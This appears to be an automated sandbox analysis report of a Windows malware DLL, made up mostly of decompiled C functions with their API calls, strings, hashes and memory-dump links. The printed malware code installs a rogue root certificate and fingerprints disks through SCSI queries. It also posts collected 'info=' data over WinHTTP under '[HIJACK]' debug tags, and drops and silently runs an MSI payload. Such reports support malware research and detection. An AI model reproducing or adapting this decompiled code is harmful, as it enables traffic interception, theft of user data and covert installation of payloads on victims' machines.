                                                                                                                                                      0x1001fbcd
                                                                                                                                                      0x1001fbe3
                                                                                                                                                      0x1001fbed
                                                                                                                                                      0x1001fbef
                                                                                                                                                      0x1001fbef
                                                                                                                                                      0x1001fbed
                                                                                                                                                      0x1001fbcd
                                                                                                                                                      0x1001fbb9
                                                                                                                                                      0x1001fb9e
                                                                                                                                                      0x1001fb80
                                                                                                                                                      0x1001fb5e
                                                                                                                                                      0x1001fb3f
                                                                                                                                                      0x1001fc02

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FA58
                                                                                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FA6D
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001FA84
                                                                                                                                                      • _memset.LIBCMT ref: 1001FAA1
                                                                                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FAB6
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001FACD
                                                                                                                                                      • _memset.LIBCMT ref: 1001FAEA
                                                                                                                                                        • Part of subcall function 1001F990: _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                        • Part of subcall function 1001F990: _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                        • Part of subcall function 1001F990: _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                        • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                        • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                        • Part of subcall function 1001F720: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                        • Part of subcall function 1001F720: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                        • Part of subcall function 1001F720: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                        • Part of subcall function 1001F720: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                        • Part of subcall function 1001F720: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                      Strings
                                                                                                                                                      • SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB09
                                                                                                                                                      • \Microsoft\Windows\win_a.dat, xrefs: 1001FA73
                                                                                                                                                      • SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FB6C
                                                                                                                                                      • \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FABC
                                                                                                                                                      • SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB2B
                                                                                                                                                      • SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FB8A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
                                                                                                                                                      • String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
                                                                                                                                                      • API String ID: 475603772-4188859120
                                                                                                                                                      • Opcode ID: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
                                                                                                                                                      • Instruction ID: cda2b8cdb8d0272306c20495e764daec9aa036c5edc3e57df8df2dc1c216ebbd
                                                                                                                                                      • Opcode Fuzzy Hash: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
                                                                                                                                                      • Instruction Fuzzy Hash: D941457A944208B7EB04DB94EC86FF93368DB68344F14845CFB1C9A182E670EB848761
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001D560, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E1001D560(void* __edi, char* _a4) {
				intOrPtr _v8;
				struct _OVERLAPPED* _v12;
				signed int _v16;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				intOrPtr _v28;
				void* _v32;
				short _v548;
				char _v1010;
				char _v1068;
				char _v1070;
				intOrPtr _v1084;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				void _v1108;
				char _v2132;
				struct _OVERLAPPED* _v2136;
				char _v2137;
				long _v2144;
				struct _OVERLAPPED* _v2148;
				intOrPtr _v2152;
				char* _v2156;
				void* _t79;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t125;
				void* _t126;
				void* _t127;

				_t125 = __edi;
				_v20 = 0;
				_v2136 = 0;
				_v24 = 0;
				do {
					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
					_t127 = _t127 + 0xc;
					_t79 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0); // executed
					_v32 = _t79;
					if(_v32 != 0xffffffff) {
						_v12 = 0;
						while(1 != 0) {
							E1000CF20(_t125,  &_v1108, 0, 0x22d);
							_t127 = _t127 + 0xc;
							_v1104 = 0x49534353;
							_v1100 = 0x4b534944;
							_v1068 = _v12;
							_v1108 = 0x1c;
							_v1096 = 0x2710;
							_v1084 = 0x211;
							_v1092 = 0x1b0501;
							_v1070 = 0xec;
							_t87 = DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0); // executed
							if(_t87 == 0 || _v1010 == 0) {
								L20:
								if(_v2136 != 0) {
									L23:
								} else {
									_v12 =  &(_v12->Internal);
									if(_v12 < 2) {
										goto L23;
									} else {
										continue;
									}
								}
							} else {
								_v16 = 0;
								do {
									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
									_v16 = _v16 + 1;
								} while (_v16 < 0x100);
								_t91 = E1001CD70( &_v2132);
								_t127 = _t127 + 4;
								_v28 = _t91;
								_v2148 = 0;
								_v8 = 0x104;
								_v2156 = _a4;
								_v2152 = _v28 - _a4;
								while(_v8 != 0x80000106) {
									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
									if(_v2137 != 0) {
										 *_v2156 = _v2137;
										_v2156 = _v2156 + 1;
										_t96 = _v8 - 1;
										_v8 = _t96;
										if(_t96 != 0) {
											continue;
										} else {
											L17:
											_v2156 = _v2156 - 1;
											_v2148 = 0x8007007a;
										}
									} else {
										break;
									}
									L18:
									 *_v2156 = 0;
									if(_v2148 < 0) {
										goto L20;
									} else {
										goto L24;
									}
									goto L25;
								}
								if(_v8 == 0) {
									goto L17;
								} else {
								}
								goto L18;
							}
							L25:
							FindCloseChangeNotification(_v32); // executed
							_v20 = _v24;
							goto L26;
						}
						L24:
						_v2136 = 1;
						goto L25;
					}
					L26:
					_v20 =  &(_v20->Internal);
					_v24 = _v20;
				} while (_v20 < 0x10);
				return _v2136;
			}


































                                                                                                                                                      0x1001d560
                                                                                                                                                      0x1001d569
                                                                                                                                                      0x1001d570
                                                                                                                                                      0x1001d57a
                                                                                                                                                      0x1001d581
                                                                                                                                                      0x1001d591
                                                                                                                                                      0x1001d597
                                                                                                                                                      0x1001d5b0
                                                                                                                                                      0x1001d5b6
                                                                                                                                                      0x1001d5bd
                                                                                                                                                      0x1001d5c3
                                                                                                                                                      0x1001d5ca
                                                                                                                                                      0x1001d5e5
                                                                                                                                                      0x1001d5ea
                                                                                                                                                      0x1001d5ed
                                                                                                                                                      0x1001d5f7
                                                                                                                                                      0x1001d604
                                                                                                                                                      0x1001d60a
                                                                                                                                                      0x1001d614
                                                                                                                                                      0x1001d61e
                                                                                                                                                      0x1001d628
                                                                                                                                                      0x1001d632
                                                                                                                                                      0x1001d660
                                                                                                                                                      0x1001d668
                                                                                                                                                      0x1001d76e
                                                                                                                                                      0x1001d775
                                                                                                                                                      0x1001d78d
                                                                                                                                                      0x1001d777
                                                                                                                                                      0x1001d780
                                                                                                                                                      0x1001d786
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d788
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d788
                                                                                                                                                      0x1001d786
                                                                                                                                                      0x1001d67d
                                                                                                                                                      0x1001d67d
                                                                                                                                                      0x1001d684
                                                                                                                                                      0x1001d692
                                                                                                                                                      0x1001d69f
                                                                                                                                                      0x1001d6a2
                                                                                                                                                      0x1001d6b2
                                                                                                                                                      0x1001d6b7
                                                                                                                                                      0x1001d6ba
                                                                                                                                                      0x1001d6bd
                                                                                                                                                      0x1001d6c7
                                                                                                                                                      0x1001d6d1
                                                                                                                                                      0x1001d6dd
                                                                                                                                                      0x1001d6e3
                                                                                                                                                      0x1001d6fa
                                                                                                                                                      0x1001d709
                                                                                                                                                      0x1001d719
                                                                                                                                                      0x1001d724
                                                                                                                                                      0x1001d72d
                                                                                                                                                      0x1001d730
                                                                                                                                                      0x1001d733
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d735
                                                                                                                                                      0x1001d741
                                                                                                                                                      0x1001d74a
                                                                                                                                                      0x1001d750
                                                                                                                                                      0x1001d750
                                                                                                                                                      0x1001d70b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d70b
                                                                                                                                                      0x1001d75a
                                                                                                                                                      0x1001d760
                                                                                                                                                      0x1001d76a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d76c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d76c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d76a
                                                                                                                                                      0x1001d73d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d73f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d73d
                                                                                                                                                      0x1001d79e
                                                                                                                                                      0x1001d7a2
                                                                                                                                                      0x1001d7ab
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d7ab
                                                                                                                                                      0x1001d794
                                                                                                                                                      0x1001d794
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d794
                                                                                                                                                      0x1001d7ae
                                                                                                                                                      0x1001d7b4
                                                                                                                                                      0x1001d7ba
                                                                                                                                                      0x1001d7bd
                                                                                                                                                      0x1001d7d0

                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfW.USER32 ref: 1001D591
                                                                                                                                                      • CreateFileW.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D5B0
                                                                                                                                                      • _memset.LIBCMT ref: 1001D5E5
                                                                                                                                                      • DeviceIoControl.KERNELBASE(000000FF,0004D008,0000001C,0000003C,0000001C,0000022D,?,00000000), ref: 1001D660
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001D7A2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChangeCloseControlCreateDeviceFileFindNotification_memsetwsprintf
                                                                                                                                                      • String ID: DISK$SCSI$\\.\Scsi%d:$z
                                                                                                                                                      • API String ID: 2954624657-153650326
                                                                                                                                                      • Opcode ID: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                      • Instruction ID: ecac459a45c55c39d0c7666526aefe1c13258bf2a5e68f6ccc56cd30cf696479
                                                                                                                                                      • Opcode Fuzzy Hash: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                      • Instruction Fuzzy Hash: 8C613AB4D04258DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB281DB759AC4CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10022760, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 138COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                      			E10022760(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v72;
				char _v100;
				char _v128;
				intOrPtr _v132;
				char _v160;
				char _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				void* __ebp;
				char* _t56;
				void* _t75;
				void* _t76;
				intOrPtr _t119;
				void* _t127;

				_t127 = __eflags;
				_t118 = __esi;
				_t117 = __edi;
				_t87 = __ebx;
				_push(0xffffffff);
				_push(E10022C17);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t119;
				_v192 = 0;
				_push(_a12);
				_push(0x30);
				_push("post_info");
				_t56 = PathFindFileNameA(".\\post_info.cpp"); // executed
				E1001F1D0(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", _t56); // executed
				_v132 = E100223F0(__ebx, __edi, __esi, _t127, _a12);
				E100225D0(__ebx, __edi, __esi, _t127,  &_v128);
				_v8 = 0;
				_v196 = E10001160( &_v160, _t127, _a8);
				_v200 = _v196;
				_v8 = 1;
				E10001A70( &_v128, _v200);
				_v8 = 0;
				E100011A0( &_v160);
				E10001160( &_v100, _t127, "info=");
				_v8 = 2;
				_v204 = E10001160( &_v188, _t127, _v132);
				_v208 = _v204;
				_v8 = 3;
				E10001A70( &_v100, _v208);
				_v8 = 2;
				E100011A0( &_v188);
				_push(E100011E0( &_v128));
				_push(0x3d);
				_push("post_info");
				E1001F1D0(_t117, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp")); // executed
				E10001160( &_v44, _t127, 0x10024ca2);
				_v8 = 4;
				E10001160( &_v72, _t127, 0x10024ca3);
				_v8 = 5;
				_t75 = E10001200( &_v100);
				_t76 = E100011E0( &_v100);
				E10021AF0(__ebx, _t117, __esi, _t127, 0, 0, 0, E100011E0( &_v128), 2, 1, 0, _t76, _t75, 0, 0, 0, 0, 0, 0,  &_v44,  &_v72); // executed
				_push(_v132);
				E1000CA30(_t87, _t117, _t118, _t127);
				E10001110(_a4, _t127,  &_v72);
				_v192 = _v192 | 0x00000001;
				_v8 = 4;
				E100011A0( &_v72);
				_v8 = 2;
				E100011A0( &_v44);
				_v8 = 0;
				E100011A0( &_v100);
				_v8 = 0xffffffff;
				E100011A0( &_v128);
				 *[fs:0x0] = _v16;
				return _a4;
			}























                                                                                                                                                      0x10022760
                                                                                                                                                      0x10022760
                                                                                                                                                      0x10022760
                                                                                                                                                      0x10022760
                                                                                                                                                      0x10022763
                                                                                                                                                      0x10022765
                                                                                                                                                      0x10022770
                                                                                                                                                      0x10022771
                                                                                                                                                      0x1002277e
                                                                                                                                                      0x1002278b
                                                                                                                                                      0x1002278c
                                                                                                                                                      0x1002278e
                                                                                                                                                      0x10022798
                                                                                                                                                      0x100227a4
                                                                                                                                                      0x100227b8
                                                                                                                                                      0x100227bf
                                                                                                                                                      0x100227c7
                                                                                                                                                      0x100227dd
                                                                                                                                                      0x100227e9
                                                                                                                                                      0x100227ef
                                                                                                                                                      0x100227fd
                                                                                                                                                      0x10022802
                                                                                                                                                      0x1002280c
                                                                                                                                                      0x10022819
                                                                                                                                                      0x1002281e
                                                                                                                                                      0x10022831
                                                                                                                                                      0x1002283d
                                                                                                                                                      0x10022843
                                                                                                                                                      0x10022851
                                                                                                                                                      0x10022856
                                                                                                                                                      0x10022860
                                                                                                                                                      0x1002286d
                                                                                                                                                      0x1002286e
                                                                                                                                                      0x10022870
                                                                                                                                                      0x10022886
                                                                                                                                                      0x10022896
                                                                                                                                                      0x1002289b
                                                                                                                                                      0x100228a7
                                                                                                                                                      0x100228ac
                                                                                                                                                      0x100228c7
                                                                                                                                                      0x100228d0
                                                                                                                                                      0x100228eb
                                                                                                                                                      0x100228f6
                                                                                                                                                      0x100228f7
                                                                                                                                                      0x10022906
                                                                                                                                                      0x10022914
                                                                                                                                                      0x1002291a
                                                                                                                                                      0x10022921
                                                                                                                                                      0x10022926
                                                                                                                                                      0x1002292d
                                                                                                                                                      0x10022932
                                                                                                                                                      0x10022939
                                                                                                                                                      0x1002293e
                                                                                                                                                      0x10022948
                                                                                                                                                      0x10022953
                                                                                                                                                      0x1002295d

                                                                                                                                                      APIs
                                                                                                                                                      • PathFindFileNameA.KERNELBASE(.\post_info.cpp,post_info,00000030,?), ref: 10022798
                                                                                                                                                        • Part of subcall function 1001F1D0: _memset.LIBCMT ref: 1001F1FB
                                                                                                                                                        • Part of subcall function 1001F1D0: OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
                                                                                                                                                        • Part of subcall function 100223F0: _memset.LIBCMT ref: 10022444
                                                                                                                                                        • Part of subcall function 100223F0: _strlen.LIBCMT ref: 10022478
                                                                                                                                                        • Part of subcall function 100223F0: _memset.LIBCMT ref: 100224E6
                                                                                                                                                        • Part of subcall function 100223F0: _strlen.LIBCMT ref: 100224F2
                                                                                                                                                        • Part of subcall function 100225D0: _memset.LIBCMT ref: 10022624
                                                                                                                                                        • Part of subcall function 100225D0: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                        • Part of subcall function 100225D0: _sprintf.LIBCMT ref: 10022666
                                                                                                                                                      • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,0000003D,00000000,?,?,info=,?,?), ref: 1002287A
                                                                                                                                                        • Part of subcall function 10021AF0: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
                                                                                                                                                        • Part of subcall function 10021AF0: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$FileFindHttpNamePath_strlen$DebugErrorFreeHeapLastLocalOpenOptionOutputStringTime___sbh_find_block___sbh_free_block_sprintf
                                                                                                                                                      • String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
                                                                                                                                                      • API String ID: 728604215-152146038
                                                                                                                                                      • Opcode ID: 769911f16bfbc381c0fecbc11744f148040757df45974d0afd696e4a0af9f17f
                                                                                                                                                      • Instruction ID: 42968dd6338b29c892dd1ec079196b21a890ae0ab2ff2efbcc3c73078d1eef52
                                                                                                                                                      • Opcode Fuzzy Hash: 769911f16bfbc381c0fecbc11744f148040757df45974d0afd696e4a0af9f17f
                                                                                                                                                      • Instruction Fuzzy Hash: 38515F75C01258EBEB14DB94DC52FDEBB74EF18380F504198F60A67286DB702B04CB52
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001FC70, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001FC70(void* __edi, void* __eflags) {
				char _v1027;
				char _v1028;
				char _v1291;
				char _v1292;
				int _t21;
				void* _t22;

				_t29 = __edi;
				_v1292 = 0;
				E1000CF20(__edi,  &_v1291, 0, 0x103);
				_v1028 = 0;
				E1000CF20(_t29,  &_v1027, 0, 0x3ff);
				GetTempPathA(0x104,  &_v1292);
				E1000CD96( &_v1292,  &_v1292, 0x104, "gdiview.msi");
				E1000CC93(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
				E1001FC10( &_v1292, 0x10026888, 0x39e00); // executed
				_t21 = PathFileExistsA( &_v1292); // executed
				_t38 = _t21;
				if(_t21 != 0) {
					_t22 = E1001A1D0(_t38,  &_v1028); // executed
					return _t22;
				}
				return _t21;
			}









                                                                                                                                                      0x1001fc70
                                                                                                                                                      0x1001fc79
                                                                                                                                                      0x1001fc8e
                                                                                                                                                      0x1001fc96
                                                                                                                                                      0x1001fcab
                                                                                                                                                      0x1001fcbf
                                                                                                                                                      0x1001fcd6
                                                                                                                                                      0x1001fcf1
                                                                                                                                                      0x1001fd0a
                                                                                                                                                      0x1001fd19
                                                                                                                                                      0x1001fd1f
                                                                                                                                                      0x1001fd21
                                                                                                                                                      0x1001fd2a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001fd2f
                                                                                                                                                      0x1001fd35

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FC8E
                                                                                                                                                      • _memset.LIBCMT ref: 1001FCAB
                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FCBF
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001FCD6
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FCF1
                                                                                                                                                        • Part of subcall function 1001FC10: CreateFileA.KERNELBASE(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
                                                                                                                                                        • Part of subcall function 1001FC10: WriteFile.KERNELBASE(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
                                                                                                                                                        • Part of subcall function 1001FC10: CloseHandle.KERNEL32(00039E00), ref: 1001FC63
                                                                                                                                                      • PathFileExistsA.KERNELBASE(00000000), ref: 1001FD19
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                        • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
                                                                                                                                                      • String ID: gdiview.msi$msiexec.exe /i "%s"
                                                                                                                                                      • API String ID: 1459467440-729886463
                                                                                                                                                      • Opcode ID: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                      • Instruction ID: fc1d18d4907088cb0004c85748b024e0f714aa859ea981698376c8e2dc0c21e3
                                                                                                                                                      • Opcode Fuzzy Hash: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                      • Instruction Fuzzy Hash: 431170BAD402186AE750D760EC46FEE7328DB54701F4444A4BB48A5085EBB1A7988F92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10020575, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 41COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E10020575(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t20;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				void* _t47;
				void* _t49;
				intOrPtr _t51;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;

				_t62 = __eflags;
				_t45 = __esi;
				_t44 = __edi;
				_t36 = __ebx;
				E1001FDB0(); // executed
				E1001FF90(__ebx, __edi, __esi, __eflags, "install", "user01", "-0.25", "45.0.0", "exe"); // executed
				_t51 = _t49 + 0x14 - 0x1c;
				_t37 = _t51;
				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
				E10020180(__ebx, __edi, __esi, _t62); // executed
				_t52 = _t51 + 0x1c;
				_t20 = PathFileExistsA("C:\\hijack"); // executed
				if(_t20 != 0) {
					L7:
					_t53 = _t52 - 0x1c;
					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
					E10020180(_t36, _t44, _t45, __eflags); // executed
					_t55 = _t53 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "user01");
					E1001FEA0(_t36, _t44, _t45, __eflags); // executed
					_t57 = _t55 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "user01");
					E1001FDC0(_t36, _t44, _t45, __eflags); // executed
					_t59 = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
					E10020180(_t36, _t44, _t45, __eflags); // executed
				} else {
					E1001A0A0(); // executed
					_t33 = E1001A0B0(_t37); // executed
					if(_t33 == 0 || E10019D10() != 0) {
					} else {
						_t35 = E1001FA30(_t36, _t44, _t45, __eflags, 0x3e8, 0); // executed
						_t52 = _t52 + 8;
						__eflags = _t35;
						if(__eflags != 0) {
							goto L7;
						} else {
						}
					}
				}
				E1001A260(); // executed
				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
				E100011A0(_t47 - 0x28);
				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t31;
			}














                                                                                                                                                      0x10020575
                                                                                                                                                      0x10020575
                                                                                                                                                      0x10020575
                                                                                                                                                      0x10020575
                                                                                                                                                      0x10020644
                                                                                                                                                      0x10020662
                                                                                                                                                      0x1002066a
                                                                                                                                                      0x1002066d
                                                                                                                                                      0x1002066f
                                                                                                                                                      0x1002067f
                                                                                                                                                      0x10020685
                                                                                                                                                      0x1002068a
                                                                                                                                                      0x10020692
                                                                                                                                                      0x1002069a
                                                                                                                                                      0x100206d0
                                                                                                                                                      0x100206d0
                                                                                                                                                      0x100206d5
                                                                                                                                                      0x100206e5
                                                                                                                                                      0x100206eb
                                                                                                                                                      0x100206f3
                                                                                                                                                      0x100206f8
                                                                                                                                                      0x10020708
                                                                                                                                                      0x1002070e
                                                                                                                                                      0x10020716
